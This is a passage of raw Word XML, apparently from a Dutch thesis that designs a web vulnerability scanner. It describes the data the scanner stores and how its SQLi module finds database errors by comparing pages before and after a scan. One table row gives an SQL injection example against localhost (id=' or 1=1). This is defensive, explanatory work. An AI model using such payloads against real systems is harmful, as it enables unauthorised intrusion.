      <w:r w:rsidR="00956242">
        <w:t xml:space="preserve">de kwetsbaarheden </w:t>
      </w:r>
      <w:r w:rsidR="00190FD5">
        <w:t>wat</w:t>
      </w:r>
      <w:r w:rsidR="00D568B6">
        <w:t xml:space="preserve"> voor het volgende component v</w:t>
      </w:r>
      <w:r w:rsidR="00792DD8">
        <w:t>an toepassing is</w:t>
      </w:r>
      <w:r w:rsidR="00D568B6">
        <w:t xml:space="preserve"> bij he</w:t>
      </w:r>
      <w:r w:rsidR="008C531E">
        <w:t>t genereren van een rapport.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D394E4" w14:textId="4003AC58" w:rsidR="003A6DDB" w:rsidRDefault="003A6DDB" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A6DDB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data dat verzameld wordt en opgeslagen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721CE411" w14:textId="2A81D0B6" w:rsidR="00983D32" w:rsidRPr="00983D32" w:rsidRDefault="007351A9" w:rsidP="008571B9">
      <w:r>
        <w:t xml:space="preserve">De data dat in </w:t>
      </w:r>
      <w:r w:rsidR="008E5873">
        <w:t>het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> analyseproces verzam</w:t>
      </w:r>
      <w:r w:rsidR="00CB7DD3">
        <w:t xml:space="preserve">eld wordt </w:t>
      </w:r>
      <w:r w:rsidR="00BF6576">
        <w:t>zal voor een groot deel opgenomen worden in het rapport (H 4.4.4).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1990"/>
        <w:gridCol w:w="3105"/>
        <w:gridCol w:w="3312"/>
      </w:tblGrid>
      <w:tr w:rsidR="00350289" w14:paraId="331EABF2" w14:textId="30F668EA" w:rsidTr="00350289">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6004CC4E" w14:textId="5308633B" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Scan data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28C0D391" w14:textId="0598BA64" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7823AF79" w14:textId="78F5FBE6" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Voorbeeld van een record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00350289" w14:paraId="3F5D7023" w14:textId="0C0FA654" w:rsidTr="00350289">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E67CE2E" w14:textId="70DD3853" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E907062" w14:textId="647AA3E6" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>De scan module die gebruikt is</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6C913F" w14:textId="0FCDA231" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00350289" w14:paraId="698041B7" w14:textId="130D0896" w:rsidTr="00350289">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA3B5BE" w14:textId="71C6BF6F" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Risico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D68453" w14:textId="319212D4" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Het risiconiveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="760F2F24" w14:textId="5ED3DA30" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Hoog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00350289" w14:paraId="7D495359" w14:textId="3F907150" w:rsidTr="00350289">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786607E2" w14:textId="70AB0C1E" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32155044" w14:textId="4EF6BB03" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>De parameter die gebruikt is</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2357E002" w14:textId="20D6CFFB" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00350289" w14:paraId="47D75EF8" w14:textId="7D396D50" w:rsidTr="00350289">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="010F6D0E" w14:textId="6CFCD268" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C01C118" w14:textId="4BE91F90" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>De URL die gebruikt is bij de aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F2385EF" w14:textId="68068742" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00350289">
              <w:t>http://localhost:8888?id</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>=’ or 1=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00350289" w14:paraId="722A4005" w14:textId="30D5DCA5" w:rsidTr="00350289">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C63225E" w14:textId="3A20D532" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25759A32" w14:textId="496CBB44" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>De error die terug gegeven is</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177E6FF9" w14:textId="5D7FD54A" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>You</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> have </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> error in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>your</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SQL syntax</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00350289" w14:paraId="0BD66A23" w14:textId="689A689D" w:rsidTr="00350289">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59E6F1C8" w14:textId="189FAAEB" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>WASC ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17B9E359" w14:textId="2C89335B" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>De corresponderende WASC ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06AC41FB" w14:textId="0C266608" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00350289" w14:paraId="4B760710" w14:textId="196BDFBA" w:rsidTr="00350289">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1990" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB28A72" w14:textId="58AB9624" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>Executie tijd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA8E706" w14:textId="2683E27B" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>De duur van de aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A72961F" w14:textId="3824F4D5" w:rsidR="00350289" w:rsidRDefault="00350289" w:rsidP="008571B9">
            <w:r>
              <w:t>0.1 seconde</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="088A6A5C" w14:textId="41BFAFC9" w:rsidR="00F50063" w:rsidRDefault="0036768B" w:rsidP="008571B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252002304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BD478A9" wp14:editId="20C7B482">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3037840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>250190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3108325" cy="510794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nalyseproces.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3108325" cy="5107940"/>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2004352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6234149A" wp14:editId="71C7796C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2910205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5387975</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3237865" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="232" name="Text Box 232"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3237865" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7A2339E1" w14:textId="2867F572" w:rsidR="00CE4BB5" w:rsidRPr="00D83FA3" w:rsidRDefault="00CE4BB5" w:rsidP="0036768B">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.17 vergrote versie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4149A" id="Text Box 232" o:spid="_x0000_s1099" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:229.15pt;margin-top:424.25pt;width:254.95pt;height:21.25pt;z-index:25200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l7zoCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EgkrbiFAxKqZJqK0E&#10;U5+N4xBLts+zDQn79Ts7hG7dnqa9mPPd+bt8390xf+i0IifhvART0sloTIkwHCppDiX9tlt/uqPE&#10;B2YqpsCIkp6Fpw+Ljx/mrS1EDg2oSjiCIMYXrS1pE4ItsszzRmjmR2CFwWANTrOAV3fIKsdaRNcq&#10;y8fjWdaCq6wDLrxH72MfpIuEX9eCh+e69iIQVVL8tpBOl859PLPFnBUHx2wj+eUz2D98hWbSYNEr&#10;1CMLjByd/ANKS+7AQx1GHHQGdS25SByQzWT8js22YVYkLiiOt1eZ/P+D5U+nF0dkVdJ8mlNimMYm&#10;7UQXyGfoSPShQq31BSZuLaaGDgPY6cHv0RmJd7XT8RcpEYyj1uervhGOo3OaT2/vZjeUcIzls/u7&#10;25sIk729ts6HLwI0iUZJHfYvycpOGx/61CElFvOgZLWWSsVLDKyUIyeGvW4bGcQF/LcsZWKugfiq&#10;B+w9Ig3LpUok3BOLVuj2XZJoNhtY76E6oxgO+oHylq8llt8wH16YwwlC/rgV4RmPWkFbUrhYlDTg&#10;fvzNH/OxsRilpMWJLKn/fmROUKK+Gmx5HN/BcIOxHwxz1CtA4hPcN8uTiQ9cUINZO9CvuCzLWAVD&#10;zHCsVdIwmKvQ7wUuGxfLZUrCIbUsbMzW8gg9yLzrXpmzlyYFbO8TDLPKine96nNTt+zyGFD41Mgo&#10;bK8iDkC84ICnUbgsY9ygX+8p6+0vY/ETAAD//wMAUEsDBBQABgAIAAAAIQCLl5+u4wAAAAsBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI+xTsMwEIZ3JN7BOiQWRJ22aeSGOFVVwQBLRejC5sbXOBCfo9hp&#10;w9tjpjLe3af/vr/YTLZjZxx860jCfJYAQ6qdbqmRcPh4eRTAfFCkVecIJfygh015e1OoXLsLveO5&#10;Cg2LIeRzJcGE0Oec+9qgVX7meqR4O7nBqhDHoeF6UJcYbju+SJKMW9VS/GBUjzuD9Xc1Wgn79HNv&#10;HsbT89s2XQ6vh3GXfTWVlPd30/YJWMApXGH404/qUEanoxtJe9ZJSFdiGVEJIhUrYJFYZ2IB7Bg3&#10;63kCvCz4/w7lLwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAA&#10;AAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAr9iXvOgIAAHoEAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCLl5+u4wAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAAJIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAogUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7A2339E1" w14:textId="2867F572" w:rsidR="00CE4BB5" w:rsidRPr="00D83FA3" w:rsidRDefault="00CE4BB5" w:rsidP="0036768B">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.17 vergrote versie bijlage b</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F84913">
        <w:t>Tabel 4.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EE59B0" w14:textId="35A182AD" w:rsidR="00902F83" w:rsidRDefault="00902F83">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analyse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274B5243" w14:textId="387EEAA4" w:rsidR="00B657FC" w:rsidRDefault="00BE73F7">
      <w:r>
        <w:t>Het analyseproces voert twee basis handelingen uit</w:t>
      </w:r>
      <w:r w:rsidR="00223D97">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vergelijken en zoeken.</w:t>
      </w:r>
      <w:r w:rsidR="00AA5810">
        <w:t xml:space="preserve"> Het vergelijkt twee versie van de</w:t>
      </w:r>
      <w:r w:rsidR="00E24EBB">
        <w:t xml:space="preserve"> broncode van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E24EBB">
        <w:t>HTML pagina</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00632092">
        <w:t>. D</w:t>
      </w:r>
      <w:r w:rsidR="00880F77">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00845D96">
        <w:t xml:space="preserve"> versie voor de scan (</w:t>
      </w:r>
      <w:r w:rsidR="002E0F9F">
        <w:t>onaangepast</w:t>
      </w:r>
      <w:r w:rsidR="00845D96">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00880F77">
        <w:t xml:space="preserve"> en de</w:t>
      </w:r>
      <w:r w:rsidR="005C294B">
        <w:t xml:space="preserve"> versie na de scan</w:t>
      </w:r>
      <w:r w:rsidR="00C50FF6">
        <w:t xml:space="preserve"> (aanval)</w:t>
      </w:r>
      <w:r w:rsidR="00845D96">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00880F77">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00424CA5">
        <w:t xml:space="preserve">Hiermee kan het Scanner component </w:t>
      </w:r>
      <w:r w:rsidR="00C50FF6">
        <w:t>controleren of er de scan effect</w:t>
      </w:r>
      <w:r w:rsidR="000B662C">
        <w:t xml:space="preserve"> heeft </w:t>
      </w:r>
      <w:r w:rsidR="002121DA">
        <w:t xml:space="preserve">gehad op de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002121DA">
        <w:t>HTML pagina</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002121DA">
        <w:t xml:space="preserve">. Mocht dit zo zijn dan is er tekst toegevoegd op de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002121DA">
        <w:t>HTML pagina</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002121DA">
        <w:t xml:space="preserve">. Dit betekent ook direct dat de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="002121DA">
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="002121DA">
        <w:t xml:space="preserve"> kwetsbaar is voor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002121DA">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002121DA">
        <w:t xml:space="preserve"> of XSS aanvallen, ligt eraan wat voor scan er is uitgevoerd.</w:t>
      </w:r>
      <w:r w:rsidR="00720167">
        <w:t xml:space="preserve"> Na het vergelijken </w:t>
      </w:r>
      <w:r w:rsidR="00AE2C78">
        <w:t xml:space="preserve">ga de Scanner </w:t>
      </w:r>
      <w:r w:rsidR="009F086C">
        <w:t>de volgende fase in waarin het specifiek gaat zoeken naar de error (Tabel 4.13, Error)</w:t>
      </w:r>
      <w:r w:rsidR="00450B68">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619ED351" w14:textId="450C6A9B" w:rsidR="006B43C8" w:rsidRPr="002121DA" w:rsidRDefault="00AE2C78">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084B5EA" w14:textId="346C4A71" w:rsidR="00460966" w:rsidRDefault="00460966" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00460966">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28B12502" w14:textId="4B5270FF" w:rsidR="00BD2037" w:rsidRDefault="00306963" w:rsidP="008571B9">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00EF7470">
        <w:t xml:space="preserve"> aanvallen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B2829">
        <w:t xml:space="preserve"> worden gedaan met de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B2829">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B2829">
        <w:t xml:space="preserve"> payloads</w:t>
      </w:r>
      <w:r w:rsidR="00A40988">
        <w:t>, deze payloads zorgen voor</w:t>
      </w:r>
      <w:r w:rsidR="00084264">
        <w:t xml:space="preserve"> twee type resultaten</w:t>
      </w:r>
      <w:r w:rsidR="00147960">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A914FE6" w14:textId="7D8D35D7" w:rsidR="00810C47" w:rsidRDefault="00D10B9F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een record uit de database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B2AED" w14:textId="78108F4C" w:rsidR="006B43C8" w:rsidRPr="008B2829" w:rsidRDefault="00D10B9F" w:rsidP="006B43C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Een error van de database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75414944" w14:textId="77777777" w:rsidR="002F4461" w:rsidRDefault="00C77D7A" w:rsidP="008571B9">
      <w:r>
        <w:t xml:space="preserve">Het controleren van de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML pagina</w:t>
      </w:r>
      <w:r w:rsidR="009C36FA">
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009C36FA">
        <w:t xml:space="preserve"> is voor iedere module anders. De </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009C36FA">
        <w:t>SQL module</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009C36FA">
        <w:t xml:space="preserve"> controleert op database errors van meerdere DBMS (Glossary, 12)</w:t>
      </w:r>
      <w:r w:rsidR="000A1D5D">
        <w:t>. Hiervoor heb ik een lijst gemaakt met SQL errors die c</w:t>
      </w:r>
      <w:r w:rsidR="00A2321C">
        <w:t xml:space="preserve">orresponderen met de SQL payload. Met andere woorden als een payload een error veroorzaakt op een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A2321C">
        <w:t>HTML pagina</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A2321C">
        <w:t xml:space="preserve"> dan is het één van</w:t>
      </w:r>
      <w:r w:rsidR="002F4461">
        <w:t xml:space="preserve"> deze errors, je kunt het zien als de error scope die ik bepaald heb voor deze scanmodule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6717928C" w14:textId="61283A52" w:rsidR="00B45C9A" w:rsidRPr="00247C7F" w:rsidRDefault="00397BB2" w:rsidP="008571B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251995136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F523421" wp14:editId="6FA6B5BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1827530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5760720" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="239" name="Text Box 239"/>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7E221EC5" w14:textId="16ADE2F0" w:rsidR="00CE4BB5" w:rsidRPr="005461F6" w:rsidRDefault="00CE4BB5" w:rsidP="00397BB2">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
